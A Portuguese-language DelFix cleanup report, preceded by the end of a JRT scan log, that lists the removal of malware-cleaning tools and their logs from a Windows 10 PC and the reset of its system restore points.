~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


File System: 0


Registry: 0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 23/03/2017 at 10:59:15,24
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# DelFix v1.013 - Relatório criado 23/03/2017 às 14:51:50
# Atualizado 17/04/2016 por Xplode
# Usuário : Helder - HELDER
# Sistema Operacional : Windows 10 Home Single Language (64 bits)

~ Removendo ferramentas de desinfecção ...

Removido : C:\FRST
Removido : C:\AdwCleaner
Removido : C:\Users\Helder\Desktop\Addition.txt
Removido : C:\Users\Helder\Desktop\AdwCleaner[C0].txt
Removido : C:\Users\Helder\Desktop\AdwCleaner[C2].txt
Removido : C:\Users\Helder\Desktop\AdwCleaner[S0].txt
Removido : C:\Users\Helder\Desktop\FRST.txt
Removido : C:\Users\Helder\Desktop\FRST64.exe
Removido : C:\Users\Helder\Desktop\JRT.txt
Removido : C:\Users\Helder\Desktop\Log MBAM 22-03-2017.txt
Removido : C:\Users\Helder\Desktop\Log_eset_online_scanner_23-03-2017.txt

~ Limpando pontos da restauração do sistema ...

Removido : RP #26 [Installed Recovery for Word 5.0.19634.2 Demo License | 03/02/2017 21:01:55]
Removido : RP #27 [Windows Update | 03/14/2017 18:49:25]
Removido : RP #28 [Windows Update | 03/20/2017 12:54:41]
Removido : RP #29 [JRT Pre-Junkware Removal | 03/23/2017 12:35:55]
Removido : RP #30 [JRT Pre-Junkware Removal | 03/23/2017 13:14:15]

Novo ponto de restauração criado !

########## - EOF - ##########